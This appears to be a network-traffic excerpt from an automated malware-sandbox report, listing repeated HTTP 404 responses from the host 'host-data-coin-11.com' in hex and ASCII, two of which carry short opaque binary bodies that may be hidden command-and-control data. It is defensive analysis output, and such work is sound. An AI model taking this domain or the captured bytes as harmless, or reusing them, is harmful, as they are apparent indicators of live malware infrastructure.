                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 48 ec a0 8a 70 bc 57 da 4a d4 f6 2e 87 25 eb c3 94 58 23 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9HpWJ.%X#c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OU&1UPJ$dP0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
